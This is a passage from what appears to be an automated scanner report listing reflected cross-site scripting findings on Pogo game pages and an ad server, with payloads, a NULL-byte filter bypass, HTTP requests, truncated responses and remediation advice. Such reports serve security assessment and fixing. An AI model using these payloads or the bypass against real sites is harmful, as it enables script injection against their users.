NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.Request
GET /?site=pogo&refid=%00b7aed"%20a%3db Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 133128 Cache-Control: private, max-age=14395 Date: Sun, 09 Jan 2011 02:09:02 GMT Connection: close <HTML> <HEAD> <meta name="msvalidate.01" content="F6F676EB374 <meta name="description" content="Download games at Pogo including puzzle games, hidden object games, Pogo ...[SNIP]... <tr style="cursor:hand;" onclick="window.location ...[SNIP]... |
3.475. http://download-games.pogo.com/ [refid parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://download-games |
Path: | / |
Issue detail
The value of the refid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4970"style%3d"x%3aexpr/*This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?site=pogo&refid Host: download-games.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 144112 Cache-Control: private, max-age=14343 Date: Sun, 09 Jan 2011 02:08:53 GMT Connection: close <HTML> <HEAD> <meta name="msvalidate.01" content="F6F676EB374 <meta name="description" content="Download games at Pogo including puzzle games, hidden object games, Pogo ...[SNIP]... <tr style="cursor:hand;" onclick="window.location ...[SNIP]... |
3.476. http://download-games.pogo.com/AllGames.aspx [SortBy parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://download-games |
Path: | /AllGames.aspx |
Issue detail
The value of the SortBy request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 125db"style%3d"x%3aexpr/*This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /AllGames.aspx?SortBy Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 62015 Cache-Control: private, max-age=14400 Date: Sun, 09 Jan 2011 02:10:12 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <meta name="description" content="Try all downloadable games at Pogo for free including Picktureka! Museum Mayhem, ...[SNIP]... <a href="/AllGames.aspx ...[SNIP]... |
3.477. http://download-games.pogo.com/AllGames.aspx [sDir parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://download-games |
Path: | /AllGames.aspx |
Issue detail
The value of the sDir request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28368"style%3d"x%3aexpr/*This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /AllGames.aspx?SortBy Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 62760 Cache-Control: private, max-age=14341 Date: Sun, 09 Jan 2011 02:10:46 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <meta name="description" content="Try all downloadable games at Pogo for free including Picktureka! Museum Mayhem, ...[SNIP]... <a href="/AllGames.aspx ...[SNIP]... |
3.478. http://download-games.pogo.com/Category.aspx [RefID parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://download-games |
Path: | /Category.aspx |
Issue detail
The value of the RefID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62ffb"style%3d"x%3aexpr/*This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Category.aspx?code=1002 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 63438 Cache-Control: private, max-age=14380 Date: Sun, 09 Jan 2011 02:10:11 GMT Connection: close <html> <head> <meta name="msvalidate.01" content="F6F676EB374 <meta name="description" content="Download new games at Pogo including Plants vs. Zombies, Mystic Empor ...[SNIP]... <tr style="cursor:hand;" onclick="window.location ...[SNIP]... |
3.479. http://download-games.pogo.com/Category.aspx [RefID parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://download-games |
Path: | /Category.aspx |
Issue detail
The value of the RefID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0a9c"%3balert(1)/This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /Category.aspx?code=1002 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 60850 Cache-Control: private, max-age=14344 Date: Sun, 09 Jan 2011 02:10:22 GMT Connection: close <html> <head> <meta name="msvalidate.01" content="F6F676EB374 <meta name="description" content="Download new games at Pogo including Plants vs. Zombies, Mystic Empor ...[SNIP]... ategory - [newGames]" /* E-commerce Variables */ var s_state="" var s_zip="" var s_purchaseID="" var s_events="" var s_products="newGames;" var s_eVar1="" var s_eVar2="" var s_eVar6="b0a9c";alert(1)/ var s_eVar7="Category Page"; var s_eVar10="oberonpogostd"; var s_Prop10="oberonpogostd"; /* You may add or alter any code config here. */ var s_server="121"; va ...[SNIP]... |
3.480. http://download-games.pogo.com/Category.aspx [refId parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://download-games |
Path: | /Category.aspx |
Issue detail
The value of the refId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 411ba"%3balert(1)/This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /Category.aspx?code=1000 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 61368 Cache-Control: private, max-age=14400 Date: Sun, 09 Jan 2011 02:10:14 GMT Connection: close <html> <head> <meta name="msvalidate.01" content="F6F676EB374 <!-- ChannelSkin: HeadUC--> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> ...[SNIP]... p_games]" /* E-commerce Variables */ var s_state="" var s_zip="" var s_purchaseID="" var s_events="" var s_products="top_games;" var s_eVar1="" var s_eVar2="" var s_eVar6="Hot_Sellers411ba";alert(1)/ var s_eVar7="Category Page"; var s_eVar10="oberonpogostd"; var s_Prop10="oberonpogostd"; /* You may add or alter any code config here. */ var s_server="102"; va ...[SNIP]... |
3.481. http://download-games.pogo.com/Category.aspx [refId parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://download-games |
Path: | /Category.aspx |
Issue detail
The value of the refId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 818ae"style%3d"x%3aexpr/*This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.Request
GET /Category.aspx?code=1000 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 63956 Cache-Control: private, max-age=14353 Date: Sun, 09 Jan 2011 02:10:06 GMT Connection: close <html> <head> <meta name="msvalidate.01" content="F6F676EB374 <!-- ChannelSkin: HeadUC--> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> ...[SNIP]... <tr style="cursor:hand;" onclick="window.location ...[SNIP]... |
3.482. http://download-games.pogo.com/deluxe.aspx [RefID parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://download-games |
Path: | /deluxe.aspx |
Issue detail
The value of the RefID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %008cad4"%3balert(1)/This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.Request
GET /deluxe.aspx?code Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 39950 Cache-Control: private, max-age=14373 Date: Sun, 09 Jan 2011 02:08:55 GMT Connection: close <HTML> <HEAD> <!-- ChannelSkin: HeadUC--> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <script type="text/javascript" language="javascript" src="/JavaScri ...[SNIP]... les */ var s_state="" var s_zip="" var s_purchaseID="" var s_events="prodView" var s_products="newGames;Cake Mania To The Max" var s_eVar1="" var s_eVar2="" var s_eVar6="pogofree010711.8cad4";alert(1)/ var s_eVar7="Game Page"; var s_eVar10="oberonpogostd"; var s_Prop10="oberonpogostd"; /* You may add or alter any code config here. */ var s_server="102"; var s_ ...[SNIP]... |
3.483. http://download-games.pogo.com/deluxe.aspx [RefID parameter] previous next
Summary
Severity: | High |
Confidence: | Firm |
Host: | http://download-games |
Path: | /deluxe.aspx |
Issue detail
The value of the RefID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c86f7"%3b2ec25516e2f was submitted in the RefID parameter. This input was echoed as c86f7";2ec25516e2f in the application's response.This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /deluxe.aspx?code Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 48209 Cache-Control: private, max-age=14385 Date: Sun, 09 Jan 2011 02:08:58 GMT Connection: close <HTML> <HEAD> <!-- ChannelSkin: HeadUC--> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <script type="text/javascript" language="javascript" src="/JavaScri ...[SNIP]... ommerce Variables */ var s_state="" var s_zip="" var s_purchaseID="" var s_events="prodView" var s_products="puzzle;Cradle Of Rome 2 Premium" var s_eVar1="" var s_eVar2="" var s_eVar6="c86f7";2ec25516e2f"; var s_eVar7="Game Page"; var s_eVar10="oberonpogostd"; var s_Prop10="oberonpogostd"; /* You may add or alter any code config here. */ var s_server="103"; var s_ ...[SNIP]... |
3.484. http://download-games.pogo.com/deluxe.aspx [RefID parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://download-games |
Path: | /deluxe.aspx |
Issue detail
The value of the RefID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1d1b"style%3d"x%3aexpr/*This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deluxe.aspx?code Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 41016 Cache-Control: private, max-age=14386 Date: Sun, 09 Jan 2011 02:08:48 GMT Connection: close <HTML> <HEAD> <!-- ChannelSkin: HeadUC--> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <script type="text/javascript" language="javascript" src="/JavaScri ...[SNIP]... <tr style="cursor:hand;" onclick="window.location ...[SNIP]... |
3.485. http://download-games.pogo.com/deluxe.aspx [RefID parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://download-games |
Path: | /deluxe.aspx |
Issue detail
The value of the RefID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 481fc"style%3d"x%3aexpr/*This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.Request
GET /deluxe.aspx?code Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 50333 Cache-Control: private, max-age=14400 Date: Sun, 09 Jan 2011 02:08:56 GMT Connection: close <HTML> <HEAD> <!-- ChannelSkin: HeadUC--> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <script type="text/javascript" language="javascript" src="/JavaScri ...[SNIP]... <tr style="cursor:hand;" onclick="window.location ...[SNIP]... |
3.486. http://download-games.pogo.com/deluxe.aspx [origin parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://download-games |
Path: | /deluxe.aspx |
Issue detail
The value of the origin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f38fc"style%3d"x%3aexpr/*This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deluxe.aspx?code Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 51683 Cache-Control: private, max-age=14366 Date: Sun, 09 Jan 2011 02:09:35 GMT Connection: close <HTML> <HEAD> <!-- ChannelSkin: HeadUC--> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <script type="text/javascript" language="javascript" src="/JavaScri ...[SNIP]... <tr style="cursor:hand;" onclick="window.location ...[SNIP]... |
3.487. http://download-games.pogo.com/deluxe.aspx [refid parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://download-games |
Path: | /deluxe.aspx |
Issue detail
The value of the refid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00fb3e9"-alert(1)-This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.Request
GET /deluxe.aspx?code Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 49260 Cache-Control: private, max-age=14400 Date: Sun, 09 Jan 2011 02:08:54 GMT Connection: close <HTML> <HEAD> <!-- ChannelSkin: HeadUC--> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <script type="text/javascript" language="javascript" src="/JavaScri ...[SNIP]... commerce Variables */ var s_state="" var s_zip="" var s_purchaseID="" var s_events="prodView" var s_products="puzzle var s_eVar1="" var s_eVar2="" var s_eVar6="14hero_bj3b.fb3e9"-alert(1)- var s_eVar7="Game Page"; var s_eVar10="oberonpogostd"; var s_Prop10="oberonpogostd"; /* You may add or alter any code config here. */ var s_server="103"; var s_ ...[SNIP]... |
3.488. http://download-games.pogo.com/deluxe.aspx [refid parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://download-games |
Path: | /deluxe.aspx |
Issue detail
The value of the refid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e35b8"style%3d"x%3aexpr/*This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deluxe.aspx?code Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 50504 Cache-Control: private, max-age=14356 Date: Sun, 09 Jan 2011 02:08:47 GMT Connection: close <HTML> <HEAD> <!-- ChannelSkin: HeadUC--> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <script type="text/javascript" language="javascript" src="/JavaScri ...[SNIP]... <tr style="cursor:hand;" onclick="window.location ...[SNIP]... |
3.489. http://download-games.pogo.com/deluxe.aspx [refid parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://download-games |
Path: | /deluxe.aspx |
Issue detail
The value of the refid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cc08"%3balert(1)/This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /deluxe.aspx?code Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 48974 Cache-Control: private, max-age=14353 Date: Sun, 09 Jan 2011 02:08:52 GMT Connection: close <HTML> <HEAD> <!-- ChannelSkin: HeadUC--> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <script type="text/javascript" language="javascript" src="/JavaScri ...[SNIP]... * E-commerce Variables */ var s_state="" var s_zip="" var s_purchaseID="" var s_events="prodView" var s_products="puzzle var s_eVar1="" var s_eVar2="" var s_eVar6="14ma_bj36cc08";alert(1)/ var s_eVar7="Game Page"; var s_eVar10="oberonpogostd"; var s_Prop10="oberonpogostd"; /* You may add or alter any code config here. */ var s_server="103"; var s_ ...[SNIP]... |
3.490. http://download-games.pogo.com/downloads.aspx [refid parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://download-games |
Path: | /downloads.aspx |
Issue detail
The value of the refid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f64dd"%3balert(1)/This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.Request
GET /downloads.aspx?site=pogo Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 134288 Cache-Control: private, max-age=14351 Date: Sun, 09 Jan 2011 02:11:09 GMT Connection: close <HTML> <HEAD> <meta name="msvalidate.01" content="F6F676EB374 <meta name="description" content="Download games at Pogo including puzzle games, hidden object games, Pogo ...[SNIP]... var s_pageName="HomePage" /* E-commerce Variables */ var s_state="" var s_zip="" var s_purchaseID="" var s_events="" var s_products=";" var s_eVar1="" var s_eVar2="" var s_eVar6="f64dd";alert(1)/ var s_eVar7="Home Page"; var s_eVar10="oberonpogostd"; var s_Prop10="oberonpogostd"; /* You may add or alter any code config here. */ var s_server="121"; var s_ ...[SNIP]... |
3.491. http://event.adxpose.com/event.flow [uid parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://event.adxpose.com |
Path: | /event.flow |
Issue detail
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 379da<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /event.flow?eventcode=000 Host: event.adxpose.com Proxy-Connection: keep-alive Referer: http://www.pandora.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: evlu=ddad3821-ec58-4641 |
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=7120D2DE3 Cache-Control: no-store Content-Type: text/javascript;charset Content-Length: 144 Date: Sun, 09 Jan 2011 02:14:36 GMT Connection: close if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__( |
3.492. http://flash-games.pogo.com/ [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://flash-games.pogo |
Path: | / |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67868"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?67868"><script>alert(1)< Host: flash-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=5B90D9FCEA1 Content-Language: en-US Set-Cookie: com.pogo.unid=660652 Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:14:44 GMT Server: Apache-Coyote/1.1 Content-Length: 23789 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://flash-games ...[SNIP]... |
3.493. http://game3.pogo.com/exhibit/game/game.jsp [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /exhibit/game/game.jsp |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 538d5"%3balert(1)/This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /exhibit/game/game.jsp Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Content-Length: 1776 Date: Sun, 09 Jan 2011 02:16:09 GMT Server: Apache-Coyote/1.1 <html> <head> <script type="text/javascript" src="/v/CjsBMQ/js/ad.js"> </script> <script language="Javascript"> function toRotating(){self setTimeout("toRotating()" </script> ...[SNIP]... |
3.494. http://game3.pogo.com/room/loading/init.jsp [ahst parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/init.jsp |
Issue detail
The value of the ahst request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8279c"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
